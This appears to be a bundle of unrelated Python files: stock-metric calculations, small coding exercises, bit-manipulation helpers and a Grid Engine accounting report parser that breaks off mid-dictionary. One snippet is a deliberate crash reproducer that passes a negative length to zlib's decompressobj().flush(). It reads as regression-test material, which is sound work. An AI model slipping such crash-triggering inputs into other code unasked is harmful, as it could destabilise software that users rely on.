    pe_lyr = round(float(data[symbol]['pe_lyr']),2);
    pb = round(float(data[symbol]['pb']),2);
    totalShares = data[symbol]['totalShares'];
    close = round(float(data[symbol]['close']),2);
    eps = round(float(data[symbol]['eps']),2);
    net_assets = float(data[symbol]['net_assets'])
    if net_assets>0:
        net_assets = round(float(data[symbol]['net_assets']),2);
    else:
        # Clamp non-positive net assets per share to a tiny positive value
        # to avoid dividing by zero in the ROE calculation below.
        net_assets = 0.00001
    # ROE derived from the quote itself: EPS / net assets per share
    # (based on the current quarter's earnings).
    roe = round(float(eps)/net_assets*100,2)
    # Alternative trailing-year ROE from PE/PB = 1 + 1/ROE, i.e.
    # ROE = PB/(PE-PB); considered more reasonable than the quarterly one.
    roe2 = round(float(pb)/(float(pe_ttm)-float(pb))*100,2)
    # Buy recommendation: cheaper (lower-PB) stocks get a larger share of
    # the per-industry budget; buyNum2 rounds to whole lots of 100 shares.
    buyPercent = round ( (-2*float(pb) + 5)/3 ,3);
    buyNum = int(round ( industryPrice*buyPercent/float(close) ,0));
    buyNum2 = int(round ( buyNum/100 ,0) * 100);
    # Trading halt: zero volume is treated as suspended.
    myVolume = float(data[symbol]['volume'])
    if myVolume==0:
        halt = True
    else:
        halt = False
    # Remember when the data was grabbed, using the first non-halted
    # stock's quote time.
    global grabTime
    if(grabTime==''):
        if not halt:
            grabTime = data[symbol]['time'];
            # Strip the timezone token before parsing.
            grabTime = grabTime.replace('+0800 ','')
            # Timestamp form.
            myTime = time.mktime( time.strptime(grabTime, "%a %b %d %H:%M:%S %Y") )
            # Human-readable form (YYYY年MM月DD日).
            timeObj = time.strptime(grabTime, "%a %b %d %H:%M:%S %Y")
            tm_year = str(timeObj.tm_year)
            tm_mon = str(timeObj.tm_mon)
            tm_mday = str(timeObj.tm_mday)
            myTimeStr = tm_year+'年'+tm_mon+'月'+tm_mday+'日'
            # Persist (disabled).
            #dataBase.saveTime(myTime,myTimeStr)
            #print '======================= '+myTimeStr+' ======================='
    return {
        "pe_ttm":pe_ttm,
        "pe_lyr":pe_lyr,
        "pb":pb,
        "totalShares":totalShares,
        "totalShares2":round(int(totalShares)/100000000,1),
        # Derived fields:
        "buyPercent":buyPercent,
        "buyNum":buyNum,
        "buyNum2":buyNum2,
        "close":close,
        "halt":halt,
        "eps":eps,
        "net_assets":net_assets, # net assets per share
        "roe":roe,
        "roe2":roe2,
        "nameStr":nameStr,
    };
# Fetch and process everything (single-stock variant); the console report
# is printed as a side effect of getAllData().
stockArr = getAllData();
#print(u'SUCCESS! 完成数据库存储');
# Export to a txt file (disabled).
# fileName = exportFile.save(stockArr);
# print(u'SUCCESS! 完成txt导出');
# Email the export to the configured recipient (disabled).
# with open(fileName, 'r') as myfile:
# data=myfile.read()
# myEmail.send(data)
# myfile.close();
# Show the grab time (disabled).
#print dataBase.getTime()[0]['timeStr'];
# End marker (disabled).
#print(u'=== END ===');
|
class Solution(object):
    def countPrimeSetBits(self, L, R):
        """
        :type L: int
        :type R: int
        :rtype: int

        Count the integers in [L, R] whose number of set bits is prime.

        Replaces the previous hand-rolled recursive memoized popcount with
        the built-in bin(i).count("1"), and the chain of equality tests
        with a set lookup. The problem bounds R at 10^6, so popcounts
        never exceed 19 and the prime set below is exhaustive.
        """
        primes = {2, 3, 5, 7, 11, 13, 17, 19}
        return sum(1 for i in range(L, R + 1) if bin(i).count("1") in primes)
|
# Read the salesperson's name, fixed salary and total sales from stdin,
# then print the pay: fixed salary plus a 15% commission on sales.
nome = str(input())  # name is read but not used in the output
fixo = float(input())
venda = float(input())
# round(..., 4) is redundant before %.2f formatting but kept as-is.
print("TOTAL = R$ %.2f" % round((fixo+(0.15*venda)),4))
|
# Roster of magicians used by the demo below.
magician_names = ['David Blaine', 'Cris Angel', 'Houdini', 'Harry Potter', 'Wutan']
def great_magicians(magicians):
    """Prefix every name in `magicians` with 'The Great ', modifying the
    list in place, and return the same list object."""
    prefixed = []
    for name in magicians:
        prefixed.append('The Great ' + name)
    magicians[:] = prefixed
    return magicians
def show_magicians(magicians):
    """Announce each magician in `magicians` on its own line."""
    for performer in magicians:
        print('Please welcome to the stage ' + performer)
# Demo: show the original roster, a decorated copy, then the original
# again to prove great_magicians() was handed a copy and did not touch it.
print('The orginal magicians list: ')
show_magicians(magician_names)
print('\nThe modified copy of magician names: ')
great_mags = great_magicians(magician_names[:])
show_magicians(great_mags)
print('\nThe original list one more time to prove that it wasnt modified: ')
show_magicians(magician_names)
#!/usr/bin/python
# Python 2 snippet that feeds zlib.decompressobj().flush() a negative
# length. NOTE(review): this looks like a deliberate crash/regression
# repro (flush(-2) raises ValueError on patched interpreters) -- confirm
# intent before "fixing". On Python 3 it would fail earlier, since
# zlib.compress() requires bytes, not str.
import zlib
msg = """
Society in every state is a blessing, but government even in its best state is but a necessary evil
in its worst state an intolerable one; for when we suffer, or are exposed to the same miseries by a
government, which we might expect in a country without government, our calamities is heightened by
reflecting that we furnish the means by which we suffer! Government, like dress, is the badge of
lost innocence; the palaces of kings are built on the ruins of the bowers of paradise. For were
the impulses of conscience clear, uniform, and irresistibly obeyed, man would need no other
lawgiver; but that not being the case, he finds it necessary to surrender up a part of his property
to furnish means for the protection of the rest; and this he is induced to do by the same prudence which
in every other case advises him out of two evils to choose the least. Wherefore, security being the true
design and end of government, it unanswerably follows that whatever form thereof appears most likely to
ensure it to us, with the least expense and greatest benefit, is preferable to all others.
""" * 1024
compMsg = zlib.compress(msg)
bad = -2  # invalid (negative) buffer length passed to flush()
decompObj = zlib.decompressobj()
# Decompress at most 1 byte; the remainder stays buffered in the object.
decompObj.decompress(compMsg, 1)
decompObj.flush(bad)
|
def is_odd_num(n):
    """Return 1 if the lowest bit of `n` is set (n is odd), else 0."""
    lowest_bit = n & 1
    return lowest_bit
# 13 = 1101 so bits are 3,2,1,0 first bit starts from zero
def is_ith_bit_set(n, i):
    """Return 1 if bit `i` of `n` is set, else 0.

    Shift bit i down to position 0 and mask it. (The original's second
    `or` operand could only ever contribute 0, so the value is unchanged.)
    """
    return (n >> i) & 1
def set_ith_bit(n, i):
    """Return `n` with bit `i` forced to 1."""
    mask = 1 << i
    return n | mask
def unset_ith_bit(n, i):
    """Return `n` with bit `i` forced to 0.

    BUG FIX: the previous implementation used XOR, which *toggles* bit
    `i` -- it set the bit whenever it was already clear. AND with the
    inverted mask clears it unconditionally.
    """
    return n & ~(1 << i)
def check_number_is_power_of_2(n):
    """Return True iff `n` is a positive power of two.

    BUG FIX: `n & (n - 1) == 0` alone also accepts 0; requiring n > 0
    rejects zero (and all negative values).
    """
    return n > 0 and (n & (n - 1)) == 0
|
#!/bin/env python
# Accounting file parser, to answer questions such as:
# - What is the breakdown of usage between faculties?
# - What is the breakdown of usage between users?
# - What is the breakdown of usage between users within a faculty?
# Try and be python2 compatible
from __future__ import print_function
import argparse
import os
import re
import sys
import math
import sge
import datetime
import time
import pytz
from tabulate import tabulate
from functools import reduce
from dateutil.relativedelta import relativedelta
# Command line arguments
# ----------------------
parser = argparse.ArgumentParser(description='Report on accounting data')
# Filters
parser.add_argument('--dates', action='store', type=str, help="Date range in UTC to report on, format [DATE][-[DATE]] where DATE has format YYYY[MM[DD[HH[MM[SS]]]]] e.g. 2018 for that year, 2018-2019 for two years, -2018 for everything up to the start of 2018, 2018- for everything after the start of 2018, 201803 for March 2018, 201806-201905 for 12 months starting June 2018. Multiple ranges supported.")
parser.add_argument('--queues', action='append', type=str, help="Queue(s) to report on")
parser.add_argument('--skipqueues', action='append', type=str, help="Queue(s) to filter out")
parser.add_argument('--queuetypes', action='append', type=str, help="Queue type(s) to report on")
parser.add_argument('--skipqueuetypes', action='append', type=str, help="Queue type(s) to filter out")
parser.add_argument('--users', action='append', type=str, help="Users(s) to report on")
parser.add_argument('--skipusers', action='append', type=str, help="Users(s) to filter out")
parser.add_argument('--projects', action='append', type=str, help="Project(s) to report on")
parser.add_argument('--skipprojects', action='append', type=str, help="Project(s) to filter out")
parser.add_argument('--parents', action='append', type=str, help="Project parent(s) to report on")
parser.add_argument('--skipparents', action='append', type=str, help="Project parent(s) to filter out")
parser.add_argument('--apps', action='store', type=str, help="Application(s) to report on")
parser.add_argument('--skipapps', action='store', type=str, help="Application(s) to filter out")
parser.add_argument('--coreprojects', action='store_true', default=False, help="Report on the core set of projects")
parser.add_argument('--limitusers', action='store', type=int, default=sys.maxsize, help="Report on n most significant users")
# Data sources
parser.add_argument('--accountingfile', action='append', type=str, help="Read accounting data from file")
parser.add_argument('--services', action='store', type=str, help="Services we are reporting on")
parser.add_argument('--credfile', action='store', type=str, help="YAML credential file")
parser.add_argument('--cores', action='store', default=0, type=int, help="Total number of cores to calculate utilisation percentages from")
parser.add_argument('--reserved_is_user', action='store_true', default=False, help="In core hour availability, are reservations user time?")
parser.add_argument('--sizebins', action='append', type=str, help="Job size range to report statistics on, format [START][-[END]]. Multiple ranges supported.")
parser.add_argument('--noadjust', action='store_true', default=False, help="Do not adjust core hours to account for memory utilisation")
parser.add_argument('--nocommas', action='store_true', default=False, help="Do not add thousand separators in tables")
parser.add_argument('--printrecords', action='store_true', default=False, help="Print records to standard out")
parser.add_argument('--reports', action='append', type=str, help="What information to report on (all, parents, projects, users, projectbyusers, totalsbydate, parentsbydate, projectsbydate, usersbydate)")
parser.add_argument('--byyear', action='store_true', default=False, help="Report date ranges, year by year")
parser.add_argument('--bymonth', action='store_true', default=False, help="Report date ranges, month by month")
parser.add_argument('--byapp', action='store_true', default=False, help="Report on applications, not users")
parser.add_argument('--byjob', action='store_true', default=False, help="Report on individual jobs")
parser.add_argument('--coprocstats', action='store_true', default=False, help="Add coproc statistics to reports")
parser.add_argument('--availstats', action='store_true', default=False, help="Add core hour availability statistics to reports")
parser.add_argument('--waitstats', action='store_true', default=False, help="Add wait statistics to reports")
parser.add_argument('--basicwaittime', action='store_true', default=False, help="Use simple wait time measure (time submit/start instead of submit/end)")
parser.add_argument('--cpuspercpu', action='store', default=1, type=int, help="Number of actual CPUs per CPU measured by the accounting data")
args = parser.parse_args()
# Prepare regexes
# ---------------
# Numeric range "[START][-[END]]" used by --sizebins.
range_def = re.compile(r"^(\d+)?(-(\d+)?)?$")
# Timestamp prefix YYYY[MM[DD[HH[MM[SS]]]]] used by --dates.
datetime_def = re.compile(r"^(\d{4})(\d{2})?(\d{2})?(\d{2})?(\d{2})?(\d{2})?$")
# Splits an optional lowercase "xxx_" prefix off a project name.
project_def = re.compile(r"^([a-z]+_)?(\S+)")
# Init parameters
# ---------------
# Maximum date (YYYY[MM[DD[HH[MM[SS]]]]]) or number to report on
max_date = "40000101"
max_num = sys.maxsize -1
# Backup method of determining node memory per core (mpc), in absence of
# node_type in job record, from hostname
# (entries map a hostname regex to node RAM divided by core count).
backup_node_mpc = [
    { 'regex': r"^d[8-9]s", 'mpc': sge.number("192G") // 40 }, # ARC4
    { 'regex': r"^d1[0-2]s", 'mpc': sge.number("192G") // 40 }, # ARC4
    { 'regex': r"^data", 'mpc': sge.number("192G") // 16 }, # ARC4
    { 'regex': r"^d8mem", 'mpc': sge.number("768G") // 40 }, # ARC4
    { 'regex': r"^db0[4-5]gpu", 'mpc': sge.number("192G") // 40 }, # ARC4
    { 'regex': r"^db12gpu[1-2]", 'mpc': sge.number("128G") // 24 }, # ARC3
    { 'regex': r"^db12gpu[3-9]", 'mpc': sge.number("256G") // 24 }, # ARC3
    { 'regex': r"^db12gpu1[0-2]", 'mpc': sge.number("256G") // 24 }, # ARC3
    { 'regex': r"^db12gpu13", 'mpc': sge.number("512G") // 24 }, # ARC3
    { 'regex': r"^db12phi", 'mpc': sge.number("112G") // 256 }, # ARC3
    { 'regex': r"^db12mem", 'mpc': sge.number("768G") // 24 }, # ARC3
    { 'regex': r"^h7s3b1[56]", 'mpc': sge.number("64G") // 24 }, # ARC2
    { 'regex': r"^h[12367]s", 'mpc': sge.number("24G") // 12 }, # ARC2
    { 'regex': r"^dc[1-4]s", 'mpc': sge.number("128G") // 24 }, # ARC3
    { 'regex': r"^c2s0b[0-3]n",'mpc': sge.number("24G") // 8 }, # ARC1
    { 'regex': r"^c[1-3]s", 'mpc': sge.number("12G") // 8 }, # ARC1
    { 'regex': r"^smp[1-4]", 'mpc': sge.number("128G") // 16 }, # ARC1
    { 'regex': r"^g8s([789]|10)n", 'mpc': sge.number("256G") // 16 }, # POLARIS
    { 'regex': r"^g[0-9]s", 'mpc': sge.number("64G") // 16 }, # POLARIS/ARC2
    { 'regex': r"^hb01s", 'mpc': sge.number("256G") // 20 }, # MARC1
    { 'regex': r"^hb02n", 'mpc': sge.number("3T") // 48 }, # MARC1
    { 'regex': r"^(comp|sky|env)", 'mpc': sge.number("2G") }, # EVEREST
    { 'regex': r"^vizcomp", 'mpc': sge.number("1G") }, # EVEREST
    { 'regex': r"^cloud", 'mpc': sge.number("4G") }, # EVEREST
]
# Compile regexes (cached alongside each entry as 're').
for n in backup_node_mpc:
    n['re'] = re.compile(n['regex'])
# Some jobs weren't allocated to a project and should have been: use the
# queue name to do this retrospectively
queue_project_mapping = {
    'env1_sgpc.q': 'sgpc',
    'env1_glomap.q': 'glomap',
    'speme1.q': 'speme',
    'env1_neiss.q': 'neiss',
    'env1_tomcat.q': 'tomcat',
    'chem1.q': 'chem',
    'civ1.q': 'civil',
    'mhd1.q': 'mhd',
    'palaeo1.q': 'palaeo1',
}
# Parent of project mappings
# (if not in table, assumes project is own parent)
project_parent_regex = [
    { 'regex': r'^(Geography|Earth|Environment|minphys|glocat|glomap|tomcat|palaeo1|sgpc|neiss|CONSUMER)$', 'parent': 'ENV' },
    { 'regex': r'^(Computing|SPEME|MechEng|speme|civil)$', 'parent': 'ENG' },
    { 'regex': r'^(Maths|Physics|Maths|Chemistry|FoodScience|mhd|skyblue|chem|maths|astro|codita)$', 'parent': 'MAPS' },
    { 'regex': r'^(Biology|omics|cryoem)$', 'parent': 'FBS' },
    { 'regex': r'^(Medicine|MEDICAL)$', 'parent': 'MEDH' },
    { 'regex': r'^(N8HPC_DUR_|dur$)', 'parent': 'DUR' },
    { 'regex': r'^(N8HPC_LAN_|lan$)', 'parent': 'LAN' },
    { 'regex': r'^(N8HPC_LDS_|lds$)', 'parent': 'LDS' },
    { 'regex': r'^(N8HPC_LIV_|liv$)', 'parent': 'LIV' },
    { 'regex': r'^(N8HPC_MCR_|mcr$)', 'parent': 'MCR' },
    { 'regex': r'^(N8HPC_NCL_|ncl$)', 'parent': 'NCL' },
    { 'regex': r'^(N8HPC_SHE_|she$)', 'parent': 'SHE' },
    { 'regex': r'^(N8HPC_YRK_|yrk$)', 'parent': 'YRK' },
]
# Compile regexes (cached alongside each entry as 're').
for n in project_parent_regex:
    n['re'] = re.compile(n['regex'])
# Some projects have changed names, or combined with other
# projects over the years. Combine them by updating old names.
project_project_mapping = {
    'ISS': 'ARC',
    'NONE': 'ARC',
    'admin': 'ARC',
    'users': 'ARC',
    'UKMHD': 'MAPS',
    'NONMEDICAL': 'OTHER',
    'EarthScience': 'Earth',
}
# Routines
# --------
def main():
    """Drive the report: normalise CLI options, ingest accounting data,
    aggregate per user/project/parent and print the requested reports.

    Relies on module globals: ``args`` (parsed options), ``dates`` (set
    here), ``sge``, and the mapping tables defined above.

    Returns:
        The list of per-date data dicts, for interactive inspection.
    """
    # One date range for all time, if not specified
    if not args.dates:
        args.dates = ['-']
    # Turn dates arg into array
    args.dates = commasep_list(args.dates)
    if '-' in args.dates:
        print("WARNING: no date specified, will be for all time")
        if args.byyear or args.bymonth:
            print("WARNING: byyear/bymonth specified, will be a lot of output")
    # Parse date argument(s)
    global dates
    dates = parse_startend(commasep_list(args.dates))
    if args.byyear: dates = splitdates(dates, 'year')
    if args.bymonth: dates = splitdates(dates, 'month')
    # Restrict to the core purchasers of ARC, if requested
    if args.coreprojects:
        args.projects = ['Arts', 'ENG', 'ENV', 'ESSL', 'FBS', 'LUBS', 'MAPS', 'MEDH', 'PVAC']
    # Read default accounting file if none specified
    if not args.accountingfile and not args.credfile:
        args.accountingfile = [os.environ["SGE_ROOT"] + "/" + os.environ["SGE_CELL"] + "/common/accounting"]
    # All reports, if not specified
    if not args.reports:
        if len(dates) > 1:
            args.reports = ['totalsbydate', 'parentsbydate', 'projectsbydate', 'usersbydate']
        else:
            args.reports = ['parents', 'projects', 'users', 'projectbyusers']
    # Job size bins, if not specified
    if not args.sizebins:
        args.sizebins = ['1', '2-24', '25-48', '49-128', '129-256', '257-512', '513-10240']
    # Allow comma separated values to indicate arrays
    ##DEBUG - would be better as a custom parseargs action
    for attr in ('skipqueues', 'queues', 'queuetypes', 'skipqueuetypes',
                 'users', 'skipusers', 'projects', 'skipprojects',
                 'parents', 'skipparents', 'accountingfile', 'reports',
                 'sizebins', 'services', 'apps', 'skipapps'):
        setattr(args, attr, commasep_list(getattr(args, attr)))
    # Parse job size bins
    sizebins = parse_startend(args.sizebins, type='int')
    # Initialise our main data structure: one entry per date range
    data = [{'date': d, 'projusers': {}, 'users': {}, 'projects': {}, 'parents': {}} for d in dates]
    # Collect raw data, split by project and user
    # - raw accounting file data
    if args.accountingfile:
        for accounting in args.accountingfile:
            print("reading from", accounting)
            for record in sge.records(accounting=accounting, modify=record_modify):
                for d in data:
                    if record_filter1(record, d['date']) and record_filter2(record, d['date']):
                        if args.byjob:
                            # Report per job rather than per user
                            record['owner'] = record['owner'] + "(" + record['job'] + ")"
                        process_raw(record, d['projusers'], sizebins)
    # - raw database accounting data
    if args.credfile:
        # Open database connection using credentials from a YAML file
        with open(args.credfile, 'r') as stream:
            import yaml
            credentials = yaml.safe_load(stream)
        import MySQLdb as mariadb
        db = mariadb.connect(**credentials)
        fields = [
            'qname', 'owner', 'project', 'maxvmem', 'start_time',
            'end_time', 'ru_wallclock', 'category', 'job_number',
            'task_number', 'slots', 'cpu', 'submission_time', 'hostname',
            'coproc', 'coproc_cpu', 'coproc_max_mem', 'coproc_maxvmem',
            'class_app', 'class_parallel', 'class_appsource',
        ]
        for service in args.services:
            print("reading database records for", service)
            for d in data:
                for record in sge.dbrecords(db, service, filter_spec=filter_spec(d['date']), fields=fields, modify=record_modify):
                    if record_filter2(record, d['date']):
                        if args.byapp:
                            # Report per application classification
                            record['owner'] = (record['class_app'] or 'unknown') \
                                + "(" + (record['class_parallel'] or 'unknown') \
                                + "/" + (record['class_appsource'] or 'unknown') + ")"
                        if args.byjob:
                            record['owner'] = record['owner'] + "(" + record['job'] + ")"
                        process_raw(record, d['projusers'], sizebins)
    # Metric keys carried at every aggregation level.
    # (Previously copy-pasted at each level; keep in sync with process_raw.)
    metrics = [
        'jobs', 'core_hours', 'core_hours_adj', 'cpu_hours',
        'mem_hours', 'mem_req_hours', 'wait_hours',
        'wall_hours', 'wall_req_hours',
        'coproc_hours', 'coproc_req_hours',
        'coproc_mem_hours', 'coproc_mem_req_hours',
    ]
    def new_stats(count_users=False):
        # Fresh zeroed accumulator for one user/project/parent
        s = {'users': 0} if count_users else {}
        s.update({k: 0 for k in metrics})
        s['job_size'] = [0 for _ in sizebins]
        return s
    def accumulate(dst, src):
        # Fold one accumulator's metrics and size histogram into another
        for k in metrics:
            dst[k] += src[k]
        for i in range(len(sizebins)):
            dst['job_size'][i] += src['job_size'][i]
    # Create summary info for projects and users
    for d in data:
        # Store info derived from date range
        ##DEBUG - figure out what to do here when range is for all time
        d['date']['hours'] = (d['date']['end'] - d['date']['start']) / float(3600)
        # Initialise
        d['date'].setdefault('core_hours', 0.0)
        d['date'].setdefault('max_core_hours', 0.0)
        # Find total number of possible core hours
        if args.cores > 0:
            d['date']['core_hours'] = d['date']['hours'] * args.cores
            d['date']['max_core_hours'] = d['date']['core_hours']
        elif args.credfile:
            # NOTE: assumes there's no significant loss of coverage of
            # host availability data in the database.
            for service in args.services:
                avail = sge.dbavail(db, service, d['date']['start'], d['date']['end'], args.queues, args.skipqueues)
                key = 'avail' if args.reserved_is_user else 'avail_usrrsv'
                d['date']['core_hours'] += float(avail[key] or 0) / float(3600)
                d['date']['max_core_hours'] += float(avail['total'] or 0) / float(3600)
        # Aggregate info for each user (summed across their projects)
        for project, pusers in d['projusers'].items():
            for user, stats in pusers.items():
                if user not in d['users']:
                    d['users'][user] = new_stats()
                accumulate(d['users'][user], stats)
        # Aggregate info for each project
        for project, pusers in d['projusers'].items():
            proj = d['projects'][project] = new_stats(count_users=True)
            for stats in pusers.values():
                proj['users'] += 1
                accumulate(proj, stats)
        # Aggregate info for each parent
        for project, proj in d['projects'].items():
            parent = project_to_parent(project)
            if parent not in d['parents']:
                d['parents'][parent] = new_stats(count_users=True)
            ##DEBUG not strictly true (double-counts users in multiple projects covered by same parent)
            d['parents'][parent]['users'] += proj['users']
            accumulate(d['parents'][parent], proj)
    # Spit out answer
    print_summary(data, args.reports, sizebins)
    # Return main data structure, in case we're using this interactively
    return data
def process_raw(record, projusers, sizebins):
    """Fold one job record into the per-project/per-user accumulator tree.

    projusers is mutated in place: projusers[project][user] holds metric
    totals plus a per-size-bin histogram of adjusted core hours.
    """
    user = record['owner']
    project = record['project']
    if args.printrecords: print(record)
    # Create accumulator slots on first sight of this project/user
    by_user = projusers.setdefault(project, {})
    if user not in by_user:
        zeros = dict.fromkeys(
            ('jobs', 'core_hours', 'core_hours_adj', 'cpu_hours',
             'mem_hours', 'mem_req_hours', 'wait_hours',
             'wall_hours', 'wall_req_hours',
             'coproc_hours', 'coproc_req_hours',
             'coproc_mem_hours', 'coproc_mem_req_hours'), 0)
        zeros['job_size'] = [0] * len(sizebins)
        by_user[user] = zeros
    stats = by_user[user]
    # Count jobs and blocked core hours
    stats['jobs'] += 1
    stats['core_hours'] += record['core_hours']
    stats['core_hours_adj'] += record['core_hours_adj']
    # Used core hours
    stats['cpu_hours'] += record['cpu'] / 3600.0
    # Used and blocked memory (weighted by blocked core hours)
    stats['mem_hours'] += record['core_hours'] * record['maxvmem']
    stats['mem_req_hours'] += record['core_hours'] * record['mem_req']
    # Wait time: submission->start (basic) or submission->end; clamp at 0
    waited_until = record['start_time'] if args.basicwaittime else record['end_time']
    stats['wait_hours'] += max((waited_until - record['submission_time']) / 3600.0, 0)
    # Wallclock time, actual and requested
    stats['wall_hours'] += record['ru_wallclock'] / 3600.0
    stats['wall_req_hours'] += sge.category_resource(record['category'], 'h_rt') / 3600.0
    # Coprocessor usage (only present in database-sourced records)
    if 'coproc' in record:
        stats['coproc_hours'] += record['coproc_cpu'] / 3600.0
        stats['coproc_req_hours'] += record['coproc'] * record['ru_wallclock'] / 3600.0
        stats['coproc_mem_hours'] += record['ru_wallclock'] * record['coproc_maxvmem']
        stats['coproc_mem_req_hours'] += record['ru_wallclock'] * record['coproc_max_mem']
    # Job size distribution: adjusted core hours into the matching bin
    for i, b in enumerate(sizebins):
        if b['start'] <= record['job_size_adj'] < b['end']:
            stats['job_size'][i] += record['core_hours_adj']
# Filtering replaced by filter_spec when reading from the database
def record_filter1(record, date):
    """Return True if the record passes the time/queue/user filters.

    These are the filters that filter_spec can also express server-side.
    """
    # Keep only jobs that ended inside the half-open window [start, end)
    if not (date['start'] <= record['end_time'] < date['end']):
        return False
    # Queue filtering
    if args.skipqueues and record['qname'] in args.skipqueues:
        return False
    if args.queues and record['qname'] not in args.queues:
        return False
    # User filtering
    if args.skipusers and record['owner'] in args.skipusers:
        return False
    if args.users and record['owner'] not in args.users:
        return False
    return True
# Filtering that cannot be replaced by filter_spec
def record_filter2(record, date):
    """Return True if the record passes project/parent/application filters.

    These fields are derived by record_modify, so they cannot be pushed
    down into a database-side filter_spec.
    """
    for field, keep, skip in (
            ('project', args.projects, args.skipprojects),
            ('parent', args.parents, args.skipparents),
            ('class_app', args.apps, args.skipapps)):
        if skip and record[field] in skip:
            return False
        if keep and record[field] not in keep:
            return False
    return True
# Return filter specification usable by sge.dbrecords
def filter_spec(date):
    """Build the server-side filter mirroring record_filter1."""
    # Time filtering: jobs ending inside the half-open window [start, end)
    spec = [
        {'end_time': {'>=': (date['start'],)}},
        {'end_time': {'<': (date['end'],)}},
    ]
    # Queue and user filtering, when requested
    for field, skip, keep in (('qname', args.skipqueues, args.queues),
                              ('owner', args.skipusers, args.users)):
        if skip:
            spec.append({field: {'!=': skip}})
        if keep:
            spec.append({field: {'=': keep}})
    # Project/parent filtering cannot go here: those fields only exist
    # after record_modify has run (see record_filter2).
    return spec
def record_modify(record):
    """Normalise one raw record in place.

    Canonicalises the project name, derives its parent, names the job,
    and attaches adjusted size / core-hour / requested-memory figures.
    """
    # Canonicalise the project name
    m = project_def.match(record['project'])
    if m:
        proj = m.group(2)
        # Retrospective queue -> project assignment
        proj = queue_project_mapping.get(record['qname'], proj)
        # Project renames / mergers over the years
        proj = project_project_mapping.get(proj, proj)
    else:
        proj = '<unknown>'
    record['project'] = proj
    # Add project parent
    record['parent'] = project_to_parent(proj)
    # Name the record: jobnumber.tasknumber (task defaults to 1)
    record['job'] = "%s.%s" % (record['job_number'], record['task_number'] or 1)
    # Effective size multiplier: 1 when adjustment is disabled
    size_adj = float(1) if args.noadjust else return_size_adj(record)
    record['job_size'] = record['slots'] * args.cpuspercpu
    record['job_size_adj'] = record['job_size'] * size_adj
    record['core_hours'] = record['ru_wallclock'] * record['job_size'] / 3600.0
    record['core_hours_adj'] = record['ru_wallclock'] * record['job_size_adj'] / 3600.0
    # Memory requested across all slots
    record['mem_req'] = record['slots'] * sge.category_resource(record['category'], 'h_vmem')
# Calculate effective job size multiplier
def return_size_adj(record):
    """Return the multiplier scaling slots to effective job size.

    A job asking for more memory per slot than its node provides per core
    effectively blocks extra cores; the multiplier is that memory ratio
    (never below 1).
    """
    # Node memory per core, from the requested node_type when available
    mem_core = None
    node_type = sge.category_resource(record['category'], 'node_type')
    if node_type:
        cores = sge.number(sge.node_type(node_type, 'num_pe'))
        memory = sge.number(sge.node_type(node_type, 'memory'))
        if cores and memory:
            mem_core = memory // cores
    # Backup method: match the execution hostname against known node classes
    if not mem_core:
        for entry in backup_node_mpc:
            if entry['re'].match(record['hostname']):
                mem_core = entry['mpc']
                break
    # Memory requested per slot
    mem_req = sge.category_resource(record['category'], 'h_vmem')
    if mem_req:
        mem_req = sge.number(mem_req)
    size_adj = float(1)
    if mem_req is not None and mem_core is not None:
        # Deliberately fractional rather than ceil'd (see commented history)
        size_adj = max(1, mem_req / float(mem_core))
    else:
        print("Warning: could not extract mem or mem per node details for",
              record['job'], "(" + record['category'] + ")", file=sys.stderr)
    return size_adj
def summarise_totalsbydate(data, bins):
    """Tabulate overall usage per date range, plus a TOTALS row.

    Returns (headers, table, totals). Rows carry every column even when
    the headers list (driven by CLI flags) omits some.
    """
    headers = ['Date', 'Parents', 'Projects', 'Users', 'Jobs', 'Core Hrs', 'Adj Core Hrs']
    if args.availstats: headers.extend(['%Avl', '%Utl'])
    if args.waitstats: headers.extend(['Wait Hrs/Jobs'])
    headers.extend(['Core Hrs/Wait', 'Wall %Acc', 'Core %Eff', 'Mem %Eff'])
    if args.coprocstats: headers.extend(['Coproc %Eff', 'Coproc Mem %Eff'])
    if bins: headers.extend([b['name'] for b in bins])
    avail_core_hours = sum(d['date']['core_hours'] for d in data)
    max_core_hours = sum(d['date']['max_core_hours'] for d in data)
    # Grand totals accumulated across dates, one slot per metric
    metrics = ('cpu_hours', 'mem_hours', 'mem_req_hours', 'wait_hours',
               'wall_hours', 'wall_req_hours', 'coproc_hours',
               'coproc_req_hours', 'coproc_mem_hours', 'coproc_mem_req_hours')
    tot = {k: 0 for k in metrics}
    table = []
    for d in data:
        projects = list(d['projects'].values())
        sums = {k: sum(p[k] for p in projects) for k in metrics}
        core_hours_adj = sum(p['core_hours_adj'] for p in projects)
        jobs = sum(p['jobs'] for p in projects)
        for k in metrics:
            tot[k] += sums[k]
        table.append({
            'Date': d['date']['name'],
            'Parents': len({project_to_parent(p) for p in d['projects']}),
            'Projects': len(d['projects']),
            'Users': len(d['users']),
            'Jobs': jobs,
            'Core Hrs': sum(p['core_hours'] for p in projects),
            'Adj Core Hrs': core_hours_adj,
            '%Avl': percent(core_hours_adj, d['date']['core_hours']),
            '%Utl': percent(core_hours_adj, d['date']['max_core_hours']),
            'Wait Hrs/Jobs': div(sums['wait_hours'], jobs),
            'Core Hrs/Wait': div(core_hours_adj, sums['wait_hours']),
            'Wall %Acc': percent(sums['wall_req_hours'], sums['wall_hours']),
            'Core %Eff': percent(sums['cpu_hours'], core_hours_adj),
            'Mem %Eff': percent(sums['mem_hours'], sums['mem_req_hours']),
            'Coproc %Eff': percent(sums['coproc_hours'], sums['coproc_req_hours']),
            'Coproc Mem %Eff': percent(sums['coproc_mem_hours'], sums['coproc_mem_req_hours']),
            **{b['name']: sum(p['job_size'][i] for p in projects) for i, b in enumerate(bins)},
        })
    totals = {
        'Date': 'TOTALS',
        'Parents': len({project_to_parent(p) for d in data for p in d['projects']}),
        'Projects': len({p for d in data for p in d['projusers']}),
        'Users': len({u for d in data for u in d['users']}),
        'Jobs': sum_key(table, 'Jobs'),
        'Core Hrs': sum_key(table, 'Core Hrs'),
        'Adj Core Hrs': sum_key(table, 'Adj Core Hrs'),
        '%Avl': percent(sum_key(table, 'Adj Core Hrs'), avail_core_hours),
        '%Utl': percent(sum_key(table, 'Adj Core Hrs'), max_core_hours),
        'Wait Hrs/Jobs': div(tot['wait_hours'], sum_key(table, 'Jobs')),
        'Core Hrs/Wait': div(sum_key(table, 'Adj Core Hrs'), tot['wait_hours']),
        'Wall %Acc': percent(tot['wall_req_hours'], tot['wall_hours']),
        'Core %Eff': percent(tot['cpu_hours'], sum_key(table, 'Adj Core Hrs')),
        'Mem %Eff': percent(tot['mem_hours'], tot['mem_req_hours']),
        'Coproc %Eff': percent(tot['coproc_hours'], tot['coproc_req_hours']),
